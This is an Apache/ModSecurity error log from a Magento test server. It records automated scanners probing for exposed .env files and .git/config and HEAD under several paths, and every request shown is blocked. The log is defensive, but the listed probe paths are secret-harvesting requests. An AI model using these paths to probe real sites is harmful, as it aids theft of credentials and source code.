[Sun Mar 09 19:17:28.373005 2025] [:error] [pid 1661335] [client 45.148.10.237:48550] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOBEUyzvDVC1ZEqXbbwAAAAY"]
[Sun Mar 09 19:17:28.373169 2025] [:error] [pid 1661335] [client 45.148.10.237:48550] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z83bOBEUyzvDVC1ZEqXbbwAAAAY"]
[Sun Mar 09 19:17:28.477919 2025] [:error] [pid 1661338] [client 45.148.10.237:48582] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bODEULeXBn1nuAGnm1QAAAAk"]
[Sun Mar 09 19:17:28.478549 2025] [:error] [pid 1661338] [client 45.148.10.237:48582] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bODEULeXBn1nuAGnm1QAAAAk"]
[Sun Mar 09 19:17:28.479013 2025] [:error] [pid 1661338] [client 45.148.10.237:48582] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z83bODEULeXBn1nuAGnm1QAAAAk"]
[Sun Mar 09 19:17:28.598198 2025] [:error] [pid 1661011] [client 45.148.10.237:48632] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOKPGLf7u63PDybKjOQAAAAM"]
[Sun Mar 09 19:17:28.598463 2025] [:error] [pid 1661011] [client 45.148.10.237:48632] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOKPGLf7u63PDybKjOQAAAAM"]
[Sun Mar 09 19:17:28.598631 2025] [:error] [pid 1661011] [client 45.148.10.237:48632] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z83bOKPGLf7u63PDybKjOQAAAAM"]
[Sun Mar 09 19:17:28.696016 2025] [authz_core:error] [pid 1661024] [client 45.148.10.237:48654] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sun Mar 09 19:17:28.795187 2025] [:error] [pid 1661337] [client 45.148.10.237:48680] [client 45.148.10.237] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOEDqCpAfbNQ_tz1tigAAAAg"]
[Sun Mar 09 19:17:28.795718 2025] [:error] [pid 1661337] [client 45.148.10.237:48680] [client 45.148.10.237] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOEDqCpAfbNQ_tz1tigAAAAg"]
[Sun Mar 09 19:17:28.796217 2025] [:error] [pid 1661337] [client 45.148.10.237:48680] [client 45.148.10.237] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z83bOEDqCpAfbNQ_tz1tigAAAAg"]
[Wed Mar 26 20:59:36.114176 2025] [:error] [pid 2028736] [client 216.81.248.11:52602] [client 216.81.248.11] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-RcqCKEG48uQfNDkjbIJgAAAAU"]
[Wed Mar 26 20:59:36.115857 2025] [:error] [pid 2028736] [client 216.81.248.11:52602] [client 216.81.248.11] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-RcqCKEG48uQfNDkjbIJgAAAAU"]
[Wed Mar 26 20:59:36.116035 2025] [:error] [pid 2028736] [client 216.81.248.11:52602] [client 216.81.248.11] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-RcqCKEG48uQfNDkjbIJgAAAAU"]
[Sat Mar 29 14:36:28.534850 2025] [:error] [pid 2106540] [client 34.221.111.118:49316] [client 34.221.111.118] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-f3XEEEMuoW1Z_Ry8_ZQQAAAAQ"]
[Sat Mar 29 14:36:28.536717 2025] [:error] [pid 2106540] [client 34.221.111.118:49316] [client 34.221.111.118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-f3XEEEMuoW1Z_Ry8_ZQQAAAAQ"]
[Sat Mar 29 14:36:28.536873 2025] [:error] [pid 2106540] [client 34.221.111.118:49316] [client 34.221.111.118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z-f3XEEEMuoW1Z_Ry8_ZQQAAAAQ"]
[Sat Mar 29 16:21:30.268159 2025] [authz_core:error] [pid 2106814] [client 159.223.64.189:54040] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/jquery-file-upload
[Sat Mar 29 16:21:47.427169 2025] [authz_core:error] [pid 2106536] [client 159.223.64.189:53212] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/webroot
[Tue Apr 15 23:24:00.787099 2025] [:error] [pid 2488335] [client 45.130.203.155:31925] [client 45.130.203.155] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z_7OcE8ybUSzaqmCyLmZRQAAAAg"]
[Tue Apr 15 23:24:00.791499 2025] [:error] [pid 2488335] [client 45.130.203.155:31925] [client 45.130.203.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z_7OcE8ybUSzaqmCyLmZRQAAAAg"]
[Tue Apr 15 23:24:00.791678 2025] [:error] [pid 2488335] [client 45.130.203.155:31925] [client 45.130.203.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z_7OcE8ybUSzaqmCyLmZRQAAAAg"]
[Fri Apr 18 14:00:05.962825 2025] [:error] [pid 2563348] [client 45.148.10.80:38994] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAI-xR2C0crP2WEOvoM_TAAAAA0"]
[Fri Apr 18 14:00:05.964249 2025] [:error] [pid 2563348] [client 45.148.10.80:38994] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAI-xR2C0crP2WEOvoM_TAAAAA0"]
[Fri Apr 18 14:00:05.964463 2025] [:error] [pid 2563348] [client 45.148.10.80:38994] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAI-xR2C0crP2WEOvoM_TAAAAA0"]
[Sat Apr 19 06:52:25.036495 2025] [:error] [pid 2576055] [client 45.130.203.194:13127] [client 45.130.203.194] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAMsCdTq9jW8h8clJy-WqwAAAAU"]
[Sat Apr 19 06:52:25.037853 2025] [:error] [pid 2576055] [client 45.130.203.194:13127] [client 45.130.203.194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAMsCdTq9jW8h8clJy-WqwAAAAU"]
[Sat Apr 19 06:52:25.038024 2025] [:error] [pid 2576055] [client 45.130.203.194:13127] [client 45.130.203.194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAMsCdTq9jW8h8clJy-WqwAAAAU"]
[Sat Apr 19 06:52:25.145225 2025] [:error] [pid 2575991] [client 45.130.203.226:60935] [client 45.130.203.226] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAMsCc-wb8lfNXzMZ_MJ7wAAAAM"]
[Sat Apr 19 06:52:25.145448 2025] [:error] [pid 2575991] [client 45.130.203.226:60935] [client 45.130.203.226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAMsCc-wb8lfNXzMZ_MJ7wAAAAM"]
[Sat Apr 19 06:52:25.145611 2025] [:error] [pid 2575991] [client 45.130.203.226:60935] [client 45.130.203.226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAMsCc-wb8lfNXzMZ_MJ7wAAAAM"]
[Tue Apr 22 00:35:20.767116 2025] [:error] [pid 2637199] [client 79.124.58.138:16082] [client 79.124.58.138] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAbIKK9eWPDOTKy0FqFnLwAAAAI"]
[Tue Apr 22 00:35:20.768892 2025] [:error] [pid 2637199] [client 79.124.58.138:16082] [client 79.124.58.138] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAbIKK9eWPDOTKy0FqFnLwAAAAI"]
[Tue Apr 22 00:35:20.769144 2025] [:error] [pid 2637199] [client 79.124.58.138:16082] [client 79.124.58.138] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAbIKK9eWPDOTKy0FqFnLwAAAAI"]
[Wed Apr 23 16:54:31.842118 2025] [:error] [pid 2662054] [client 93.123.109.77:50340] [client 93.123.109.77] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAj_J0IUj2Dsb_JcZcYQwQAAAAI"]
[Wed Apr 23 16:54:31.843989 2025] [:error] [pid 2662054] [client 93.123.109.77:50340] [client 93.123.109.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAj_J0IUj2Dsb_JcZcYQwQAAAAI"]
[Wed Apr 23 16:54:31.844203 2025] [:error] [pid 2662054] [client 93.123.109.77:50340] [client 93.123.109.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAj_J0IUj2Dsb_JcZcYQwQAAAAI"]
[Thu Apr 24 04:53:46.003507 2025] [:error] [pid 2695522] [client 93.123.109.81:47936] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAmnuiuLoA8MJ58O1XJ1nAAAAAY"]
[Thu Apr 24 04:53:46.003764 2025] [:error] [pid 2695522] [client 93.123.109.81:47936] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAmnuiuLoA8MJ58O1XJ1nAAAAAY"]
[Thu Apr 24 04:53:46.003961 2025] [:error] [pid 2695522] [client 93.123.109.81:47936] [client 93.123.109.81] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aAmnuiuLoA8MJ58O1XJ1nAAAAAY"]
[Thu Apr 24 04:53:46.210356 2025] [:error] [pid 2695501] [client 93.123.109.81:47946] [client 93.123.109.81] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aAmnugg8-OLWLJp_cI3zqAAAAAQ"]
[Thu Apr 24 04:53:46.210612 2025] [:error] [pid 2695501] [client 93.123.109.81:47946] [client 93.123.109.81] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aAmnugg8-OLWLJp_cI3zqAAAAAQ"]
